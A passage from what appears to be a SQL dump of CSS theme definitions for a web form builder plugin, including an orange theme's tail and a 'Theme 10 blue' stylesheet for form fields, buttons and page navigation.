#e8a467 1%, #ffb471 20%, #ffb471 80%, #ffcd72 100%); /* W3C */\r\n	text-align: left;\r\n	padding: 7px 30px 10px 10px;\r\n	border-top-left-radius: 0px;\r\n	border-top-right-radius: 10px;\r\n	border-bottom-right-radius: 10px;\r\n	border-bottom-left-radius: 0px;\r\n	-moz-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\nfont-size:18px;\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 16px 10px 16px 0px;\r\nfont-size:18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 7px;\r\n	height: 32px;\r\n	overflow: hidden;\r\n	border: 1px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 70px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/01/checkbox.png);\r\n	border-radius: 2px;\r\n	top: 0px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/01/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 37px;\r\n	height: 30px;\r\n	position: relative;\r\n	left: -35px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n	outline:none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 10px;\r\n	background: #615F60;\r\n	border-radius: 2px;\r\n	top: 3px;\r\n	left: 3px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	border-top: 1px solid #D8D6D7;\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 7px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #000;\r\n	cursor: pointer;\r\n	background-color: #FFD9B8;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_active {\r\n	color: #000;\r\n	cursor: pointer;\r\n	background-color: #FFB471;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 25px;\r\n	line-height: 25px;\r\n	border-top-left-radius: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #FF983C; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #f6a965 0%, #f6a965 67%, #ff983c 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #f6a965), color-stop(67%, #f6a965), color-stop(100%, #ff983c)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #f6a965 0%, #f6a965 67%, #ff983c 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #f6a965 0%, #f6a965 67%, #ff983c 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #f6a965 0%, #f6a965 67%, #ff983c 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #f6a965 0%, #f6a965 67%, #ff983c 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 25px;\r\n	line-height: 25px;\r\n	background-color: #FFD9B8;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n	border-top-left-radius: 17px;\r\n	border-top-right-radius: 17px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation span:first-child {\r\n	border-top-left-radius: 17px;\r\n}\r\n.wdform_percentage_arrow {\r\ndisplay: inline-block;\r\nwidth: 21px;\r\nheight: 25px;\r\nbackground-color: #FF983D;\r\nposition: relative;\r\nleft: -15px;\r\nz-index: 0;\r\nvertical-align: middle;\r\n-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\ntransform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -14px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 25px;\r\n	height: 25px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform_button button {\r\n	background: #e4e4e4; /* Old browsers */\r\n	background: -moz-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #e4e4e4), color-stop(100%, #cccccc)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* IE10+ */\r\n	background: linear-gradient(to bottom, #e4e4e4 0%, #cccccc 100%); /* W3C */\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}', 0),
(36, 'Theme 10 blue', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #D1E0F0;\r\nborder: 1px solid #075DA4;\r\nmargin-bottom: 10px;\r\ncolor: #075DA4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/01/02/next_hoverbg.png) url([SITE_ROOT]/images/01/02/previous_hover.png) url([SITE_ROOT]/images/01/02/next_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #004D8E !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #004D8E !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #004D8E !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #004D8E !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 7px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 26px;\r\n	line-height: 26px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 28px;\r\n	width: 32px;\r\n	background: url([SITE_ROOT]/images/01/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 1px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-page-and-images:after {\r\n	width: 100%;\r\n	content: "";\r\n	display: block;\r\n	height: 17px;\r\n	background: url([SITE_ROOT]/images/01/0.png) no-repeat center center;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -17px;\r\n	left: -50px;\r\n	padding-left: 100px;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 7px;\r\n	height: 27px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n//text-overflow: ellipsis;\r\n}\r\n.file-picker {\r\n	width: 38px;\r\n	height: 34px;\r\n	background: url([SITE_ROOT]/images/01/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/01/nextbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\n	border-style: solid;\r\n	padding: 0px 15px;\r\n	vertical-align: middle;\r\n	border-color: transparent;\r\n}\r\ndiv.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/01/02/next_hoverbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\ncolor:#fff;\r\n}\r\n.next-page div.wdform-page-button {\r\n	border-width: 0px 18px 0px 0px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	box-shadow: inset 51px 0px 8px -50px #636363;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/02/next_hover.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/02/next_hover.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/02/next_hover.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/02/next_hover.png) 0 36 0 0 stretch;\r\n}\r\n.next-page:before {\r\n	content: "";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	border-width: 0px 0px 0px 18px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	box-shadow: inset -51px 0px 8px -50px #636363;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/02/previous_hover.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/02/previous_hover.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/02/previous_hover.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/02/previous_hover.png) 0 0 0 36 stretch;\r\n}\r\n.previous-page:after {\r\n	content: "";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow1.png) no-repeat right center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: -7px;\r\n}\r\n.button-submit {\r\nbackground: #035192 ;\r\nbackground: -moz-linear-gradient(left, #035192 0%, #0860A9 20%, #0860A9 80%, #035192 100%);\r\nbackground: -webkit-gradient(linear, left top, right top, color-stop(0%, #035192 ), color-stop(20%, #0860A9 ), color-stop(80%, #0860A9 ), color-stop(100%, #035192 ));\r\nbackground: -webkit-linear-gradient(left, #035192 0%, #0860A9 20%, #0860A9 80%, #035192 100%);\r\nbackground: -o-linear-gradient(left, #035192 0%, #0860A9 20%, #0860A9 80%, #035192 100%);\r\nbackground: -ms-linear-gradient(left, #035192 0%, #0860A9 20%, #0860A9 80%, #035192 100%);\r\nbackground: linear-gradient(to right, #035192 0%, #0860A9 20%, #0860A9 80%, #035192 100%);\r\ncursor: pointer;\r\nfont-size: 17px;\r\nborder-radius: 7px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 1px solid #3A8BCF;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #063A66;\r\nfont-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 1px solid #c9c9c9;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #D1E0F0;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n	border-top: 1px solid #004D8E;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break2 {\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #0559A0 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #00457F 1%, #0559A0 20%, #0E6AB8 80%, #006CC7 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(1%, #00457F ), color-stop(20%, #0559A0 ), color-stop(80%, #0E6AB8 ), color-stop(100%, #006CC7 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #00457F 1%, #0559A0 20%, #0E6AB8 80%, #006CC7 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #00457F 1%, #0559A0 20%, #0E6AB8 80%, #006CC7 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #00457F 1%, #0559A0 20%, #0E6AB8 80%, #006CC7 100%); /* IE10+ */\r\nbackground: linear-gradient(to right, #00457F 1%, #0559A0 20%, #0E6AB8 80%, #006CC7 100%); /* W3C */\r\n	text-align: left;\r\n	padding: 7px 30px 10px 10px;\r\n	border-top-left-radius: 0px;\r\n	border-top-right-radius: 10px;\r\n	border-bottom-right-radius: 10px;\r\n	border-bottom-left-radius: 0px;\r\n	-moz-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\ncolor:#fff;\r\nfont-size:18px;\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 16px 0px;\r\nfont-size:18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 7px;\r\n	height: 32px;\r\n	overflow: hidden;\r\n	border: 1px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #004D8E;\r\n	outline: none;\r\n}\r\n\r\ninput[type="password"]:focus{\r\n	border-color: #004D8E;\r\n	outline: none;\r\n}\r\n\r\ntextarea:focus{\r\n	border-color: #004D8E;\r\n	outline: none;\r\n}\r\n\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 70px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/01/checkbox.png);\r\n	border-radius: 2px;\r\n	top: 0px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: 